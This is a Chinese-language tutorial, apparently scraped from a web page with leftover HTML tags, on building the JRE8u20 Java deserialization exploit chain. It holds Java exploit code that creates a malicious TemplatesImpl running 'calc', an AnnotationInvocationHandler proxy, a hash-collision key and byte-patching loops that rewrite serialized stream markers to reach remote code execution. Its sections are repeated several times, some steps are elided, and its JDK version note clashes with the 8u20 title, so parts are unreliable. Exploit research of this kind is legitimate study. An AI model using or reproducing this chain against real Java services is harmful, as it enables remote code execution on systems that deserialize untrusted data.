JRE8u20 Gadget构造简化方法教学文档<\/h1>

概述<\/h2>
本文档详细讲解如何以更简单的方式构造JRE8u20反序列化漏洞利用链(Gadget)。该方法通过修改序列化字节码的方式，避免了复杂的全手动构造过程，同时保留了原漏洞利用链的核心原理。<\/p>

核心知识点<\/h2>

1. LinkedHashSet的特性利用<\/h3>

哈希碰撞原理<\/strong>：在jdk7u21中，通过向LinkedHashSet中塞入特定对象触发RCE<\/li>
扩展性<\/strong>：只要包含特定的2个关键对象，可以额外添加任意数量的其他对象而不影响利用<\/li>

示例<\/strong>：即使添加了额外字符串对象，利用链仍能正常工作<\/li> <\/ul>
2. 修改序列化字节码调整LinkedHashSet元素数量<\/h3>
实现步骤<\/strong>：<\/p>

创建包含1个元素的LinkedHashSet并序列化<\/li>
修改字节码将元素数量从1改为3<\/li>
调整TC_ENDBLOCKDATA标记位置<\/li>
反序列化时LinkedHashSet会读取3个元素<\/li> <\/ol>
关键代码<\/strong>：<\/p>
\/\/ 修改hashset的长度(元素个数),由1修改为3 <\/span><\/span><\/span><\/span>bytes[<\/span>89<\/span>]<\/span> =<\/span> 3<\/span>;<\/span> <\/span><\/span> <\/span><\/span>\/\/ 调整TC_ENDBLOCKDATA标记的位置 <\/span><\/span><\/span><\/span>for<\/span>(<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> bytes.<\/span>length<\/span>;<\/span> i++){<\/span> <\/span><\/span> if<\/span>(<\/span>bytes[<\/span>i]<\/span> ==<\/span> 97<\/span> &&<\/span> bytes[<\/span>i+<\/span>1<\/span>]<\/span> ==<\/span> 97<\/span> &&<\/span> bytes[<\/span>i+<\/span>2<\/span>]<\/span> ==<\/span> 97<\/span>){<\/span> <\/span><\/span> bytes =<\/span> Util.<\/span>deleteAt<\/span>(<\/span>bytes,<\/span> i +<\/span> 3<\/span>);<\/span> <\/span><\/span> break<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span>bytes =<\/span> Util.<\/span>addAtLast<\/span>(<\/span>bytes,<\/span> (<\/span>byte<\/span>)<\/span> 0x78<\/span>);<\/span> <\/span><\/span><\/code><\/pre>原理图示<\/strong>：<\/p> 原始序列化流: [LinkedHashSet(1元素)][TC_ENDBLOCKDATA][其他对象1][其他对象2] 修改后序列化流: [LinkedHashSet(3元素)][其他对象1][其他对象2][TC_ENDBLOCKDATA] <\/code><\/pre> 3. 控制BeanContextSupport反序列化指定对象<\/h3> BeanContextSupport关键代码<\/strong>：<\/p> private<\/span> synchronized<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream ois)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> synchronized<\/span>(<\/span>BeanContext.<\/span>globalHierarchyLock<\/span>)<\/span> {<\/span> <\/span><\/span> ois.<\/span>defaultReadObject<\/span>();<\/span> <\/span><\/span> initialize();<\/span> <\/span><\/span> bcsPreDeserializationHook(<\/span>ois);<\/span> <\/span><\/span> if<\/span> (<\/span>serializable ><\/span> 0<\/span> &&<\/span> this<\/span>.<\/span>equals<\/span>(<\/span>getBeanContextPeer()))<\/span> <\/span><\/span> readChildren(<\/span>ois);<\/span> <\/span><\/span> deserialize(<\/span>ois,<\/span> bcmListeners =<\/span> new<\/span> ArrayList(<\/span>1<\/span>));<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>实现步骤<\/strong>：<\/p> 创建BeanContextSupport对象并设置serializable=0<\/li> 序列化BeanContextSupport后跟着Payload对象<\/li> 修改字节码将serializable改为1<\/li> 调整TC_BLOCKDATA位置使Payload成为BeanContextSupport要读取的子对象<\/li> <\/ol> 关键代码<\/strong>：<\/p> \/\/ 将serializable的值修改为1 <\/span><\/span><\/span><\/span>for<\/span>(<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> bytes.<\/span>length<\/span>;<\/span> i++){<\/span> <\/span><\/span> if<\/span>(<\/span>bytes[<\/span>i]<\/span> ==<\/span> 120<\/span> &&<\/span> bytes[<\/span>i+<\/span>1<\/span>]<\/span> ==<\/span> 0<\/span> &&<\/span> bytes[<\/span>i+<\/span>2<\/span>]<\/span> ==<\/span> 1<\/span> <\/span><\/span> &&<\/span> bytes[<\/span>i+<\/span>3<\/span>]<\/span> ==<\/span> 0<\/span> &&<\/span> bytes[<\/span>i+<\/span>4<\/span>]<\/span> ==<\/span> 0<\/span> <\/span><\/span> &&<\/span> bytes[<\/span>i+<\/span>5<\/span>]<\/span> ==<\/span> 0<\/span> &&<\/span> bytes[<\/span>i+<\/span>6<\/span>]<\/span> ==<\/span> 0<\/span> &&<\/span> bytes[<\/span>i+<\/span>7<\/span>]<\/span> ==<\/span> 115<\/span>){<\/span> <\/span><\/span> bytes[<\/span>i+<\/span>6<\/span>]<\/span> =<\/span> 1<\/span>;<\/span> <\/span><\/span> break<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ 调整TC_BLOCKDATA位置 <\/span><\/span><\/span><\/span>for<\/span>(<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> bytes.<\/span>length<\/span>;<\/span> i++){<\/span> <\/span><\/span> if<\/span>(<\/span>bytes[<\/span>i]<\/span> ==<\/span> 119<\/span> &&<\/span> bytes[<\/span>i+<\/span>1<\/span>]<\/span> ==<\/span> 4<\/span> &&<\/span> bytes[<\/span>i+<\/span>2<\/span>]<\/span> ==<\/span> 0<\/span> <\/span><\/span> &&<\/span> bytes[<\/span>i+<\/span>3<\/span>]<\/span> ==<\/span> 0<\/span> &&<\/span> bytes[<\/span>i+<\/span>4<\/span>]<\/span> ==<\/span> 0<\/span> <\/span><\/span> &&<\/span> bytes[<\/span>i+<\/span>5<\/span>]<\/span> ==<\/span> 0<\/span> &&<\/span> bytes[<\/span>i+<\/span>6<\/span>]<\/span> ==<\/span> 120<\/span>){<\/span> <\/span><\/span> \/\/ 删除原有TC_BLOCKDATA <\/span><\/span><\/span><\/span> bytes =<\/span> Util.<\/span>deleteAt<\/span>(<\/span>bytes,<\/span> i);<\/span> <\/span><\/span> \/\/ ...多次删除操作... <\/span><\/span><\/span><\/span> break<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span>\/\/ 在适当位置重新添加TC_BLOCKDATA <\/span><\/span><\/span><\/code><\/pre>原理图示<\/strong>：<\/p> 原始序列化流: [BeanContextSupport][TC_BLOCKDATA][TC_ENDBLOCKDATA][Payload] 修改后序列化流: [BeanContextSupport(serializable=1)][Payload][TC_BLOCKDATA][TC_ENDBLOCKDATA] <\/code><\/pre> 完整JRE8u20 Gadget构造<\/h2> 利用链结构<\/h3> 反序列化LinkedHashSet(元素数量设为3)<\/li> 第一个元素BeanContextSupport触发readChildren 反序列化AnnotationInvocationHandler(虽然会抛出异常但被捕获)<\/li> <\/ul> <\/li> 第二、三个元素触发哈希碰撞最终导致RCE<\/li> <\/ul> <\/li> <\/ol> 关键实现代码<\/h3> \/\/ 1. 准备恶意Templates对象 <\/span><\/span><\/span><\/span>final<\/span> Object templates =<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 2. 创建AnnotationInvocationHandler代理 <\/span><\/span><\/span><\/span>String zeroHashCodeStr =<\/span> "f5a5a608"<\/span>;<\/span> <\/span><\/span>HashMap map =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>map.<\/span>put<\/span>(<\/span>zeroHashCodeStr,<\/span> "foo"<\/span>);<\/span> <\/span><\/span>InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> Reflections.<\/span>getFirstCtor<\/span>(<\/span> <\/span><\/span> Gadgets.<\/span>ANN_INV_HANDLER_CLASS<\/span>).<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span> map);<\/span> <\/span><\/span>Reflections.<\/span>setFieldValue<\/span>(<\/span>handler,<\/span> "type"<\/span>,<\/span> Templates.<\/span>class<\/span>);<\/span> <\/span><\/span>Templates proxy =<\/span> Gadgets.<\/span>createProxy<\/span>(<\/span>handler,<\/span> Templates.<\/span>class<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 3. 设置Templates对象 <\/span><\/span><\/span><\/span>Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_auxClasses"<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span>Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_class"<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span>map.<\/span>put<\/span>(<\/span>zeroHashCodeStr,<\/span> templates);<\/span> \/\/ 替换为真实恶意对象 <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 4. 创建LinkedHashSet和BeanContextSupport <\/span><\/span><\/span><\/span>LinkedHashSet set =<\/span> new<\/span> LinkedHashSet();<\/span> <\/span><\/span>BeanContextSupport bcs =<\/span> new<\/span> BeanContextSupport();<\/span> <\/span><\/span>Class cc =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.beans.beancontext.BeanContextSupport"<\/span>);<\/span> <\/span><\/span>Field serializable =<\/span> cc.<\/span>getDeclaredField<\/span>(<\/span>"serializable"<\/span>);<\/span> <\/span><\/span>serializable.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>serializable.<\/span>set<\/span>(<\/span>bcs,<\/span> 0<\/span>);<\/span> <\/span><\/span>Field beanContextChildPeer =<\/span> cc.<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"beanContextChildPeer"<\/span>);<\/span> <\/span><\/span>beanContextChildPeer.<\/span>set<\/span>(<\/span>bcs,<\/span> bcs);<\/span> <\/span><\/span>set.<\/span>add<\/span>(<\/span>bcs);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 5. 序列化 <\/span><\/span><\/span><\/span>ByteArrayOutputStream baous =<\/span> new<\/span> ByteArrayOutputStream();<\/span> <\/span><\/span>ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>baous);<\/span> <\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>set);<\/span> <\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>handler);<\/span> <\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>templates);<\/span> <\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>proxy);<\/span> <\/span><\/span>oos.<\/span>close<\/span>();<\/span> <\/span><\/span>byte<\/span>[]<\/span> bytes =<\/span> baous.<\/span>toByteArray<\/span>();<\/span> <\/span><\/span> <\/span><\/span>\/\/ 6. 修改字节码 <\/span><\/span><\/span>\/\/ ... (此处包含前面介绍的所有字节码修改步骤) ... <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 7. 写入文件并测试 <\/span><\/span><\/span><\/span>FileOutputStream fous =<\/span> new<\/span> FileOutputStream(<\/span>"jre8u20.ser"<\/span>);<\/span> <\/span><\/span>fous.<\/span>write<\/span>(<\/span>bytes);<\/span> <\/span><\/span>fous.<\/span>close<\/span>();<\/span> <\/span><\/span> <\/span><\/span>\/\/ 反序列化测试 <\/span><\/span><\/span><\/span>FileInputStream fis =<\/span> new<\/span> FileInputStream(<\/span>"jre8u20.ser"<\/span>);<\/span> <\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>fis);<\/span> <\/span><\/span>ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span>ois.<\/span>close<\/span>();<\/span> <\/span><\/span><\/code><\/pre>关键字节码修改点<\/h3> 修改LinkedHashSet的size从1改为3<\/li> 调整TC_ENDBLOCKDATA标记位置<\/li> 修改BeanContextSupport.serializable从0改为1<\/li> 移动TC_BLOCKDATA块位置<\/li> 修改AnnotationInvocationHandler的classDescFlags 从SC_SERIALIZABLE改为SC_SERIALIZABLE | SC_WRITE_METHOD<\/li> 防止defaultDataEnd提前结束反序列化<\/li> <\/ul> <\/li> <\/ol> 注意事项<\/h2> 需要在JDK ≤ 7u20环境下测试，高版本需调整<\/li> 字节码修改需要精确匹配特定位置<\/li> AnnotationInvocationHandler反序列化会抛出异常但被捕获，不影响利用<\/li> 哈希碰撞是触发RCE的关键<\/li> <\/ol> 参考工具<\/h2> Util<\/code>类提供字节码操作工具方法： deleteAt<\/code>: 删除指定位置字节<\/li> addAtLast<\/code>: 在末尾添加字节<\/li> addAtIndex<\/code>: 在指定位置插入字节<\/li> <\/ul> <\/li> <\/ul> 总结<\/h2> 通过这种方法，我们可以：<\/p> 避免全手动构造复杂的序列化字节码<\/li> 利用Java原生序列化机制，仅修改关键字节<\/li> 实现JRE8u20反序列化漏洞的稳定利用<\/li> 保持利用链的扩展性和可维护性<\/li> <\/ol>

JRE8u20 Gadget构造简化方法教学文档<\/h1>

概述<\/h2> 本文档详细讲解如何以更简单的方式构造JRE8u20反序列化漏洞利用链(Gadget)。该方法通过修改序列化字节码的方式，避免了复杂的全手动构造过程，同时保留了原漏洞利用链的核心原理。<\/p>

核心知识点<\/h2>

完整JRE8u20 Gadget构造<\/h2>

总结<\/h2> 通过这种方法，我们可以：<\/p> 避免全手动构造复杂的序列化字节码<\/li> 利用Java原生序列化机制，仅修改关键字节<\/li> 实现JRE8u20反序列化漏洞的稳定利用<\/li> 保持利用链的扩展性和可维护性<\/li> <\/ol>

概述<\/h2>
本文档详细讲解如何以更简单的方式构造JRE8u20反序列化漏洞利用链(Gadget)。该方法通过修改序列化字节码的方式，避免了复杂的全手动构造过程，同时保留了原漏洞利用链的核心原理。<\/p>

总结<\/h2>
通过这种方法，我们可以：<\/p>

避免全手动构造复杂的序列化字节码<\/li>
利用Java原生序列化机制，仅修改关键字节<\/li>
实现JRE8u20反序列化漏洞的稳定利用<\/li>
保持利用链的扩展性和可维护性<\/li> <\/ol>